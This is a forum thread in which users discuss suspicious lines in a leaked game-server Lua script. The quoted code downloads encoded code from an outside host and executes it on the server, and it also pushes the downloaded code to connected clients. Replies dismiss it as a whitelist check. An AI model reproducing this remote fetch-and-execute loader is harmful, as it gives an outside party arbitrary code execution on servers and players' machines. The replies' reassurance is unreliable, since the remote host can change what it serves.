BumpyJohnson 1 Posted August 21, 2023 Sketchy lines on the server.lua PerformHttpRequest("http://filesecuring.com/securefiles/get.php?id=730875619880818", function(err, text, headers) local code = '' for word in string.gmatch(text, '([^\\]+)') do code = code .. string.char(tonumber(word)) -- decrypt the code (won't run otherwise) end assert(load(code))() -- run the code end, 'GET', '') RegisterServerEvent('filesecuring:load') AddEventHandler('filesecuring:load', function() local src = source PerformHttpRequest("http://filesecuring.com/securefiles/get.php?id=455044015505684", function(err, text, headers) local code = '' for word in string.gmatch(text, '([^\\]+)') do code = code .. string.char(tonumber(word)) -- decrypt the code (won't run otherwise) end TriggerClientEvent('client:load-code', src, code) end, 'GET', '') end)
Staff Supervisor Auctions | Staff Supervisor 51 Posted August 21, 2023 Staff Supervisor 2 hours ago, Arfy said: Sketchy lines on the server.lua PerformHttpRequest("http://filesecuring.com/securefiles/get.php?id=730875619880818", function(err, text, headers) local code = '' for word in string.gmatch(text, '([^\\]+)') do code = code .. string.char(tonumber(word)) -- decrypt the code (won't run otherwise) end assert(load(code))() -- run the code end, 'GET', '') RegisterServerEvent('filesecuring:load') AddEventHandler('filesecuring:load', function() local src = source PerformHttpRequest("http://filesecuring.com/securefiles/get.php?id=455044015505684", function(err, text, headers) local code = '' for word in string.gmatch(text, '([^\\]+)') do code = code .. string.char(tonumber(word)) -- decrypt the code (won't run otherwise) end TriggerClientEvent('client:load-code', src, code) end, 'GET', '') end) I checked the code on the external sites and it should not be anything malicious, but it indicated that this script might not work unless whitelisted by the creator, the code on the websites translates to: print('You don\'t have access to this script! Your server ip: IP') So no need to worry.
deezleaks 6 Posted August 21, 2023 4 hours ago, Arfy said: Sketchy lines on the server.lua PerformHttpRequest("http://filesecuring.com/securefiles/get.php?id=730875619880818", function(err, text, headers) local code = '' for word in string.gmatch(text, '([^\\]+)') do code = code .. string.char(tonumber(word)) -- decrypt the code (won't run otherwise) end assert(load(code))() -- run the code end, 'GET', '') RegisterServerEvent('filesecuring:load') AddEventHandler('filesecuring:load', function() local src = source PerformHttpRequest("http://filesecuring.com/securefiles/get.php?id=455044015505684", function(err, text, headers) local code = '' for word in string.gmatch(text, '([^\\]+)') do code = code .. string.char(tonumber(word)) -- decrypt the code (won't run otherwise) end TriggerClientEvent('client:load-code', src, code) end, 'GET', '') end) Its Just To Check If Your Server Is Whitelisted To Use It
Affen88 0 Posted August 24, 2023 Who ever posted this code: You have to print the script if you bought it with your whitelisted IP. Its not possible to get the code as long as you are not whitelisted on the HttpRequest.
Recommended Comments
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now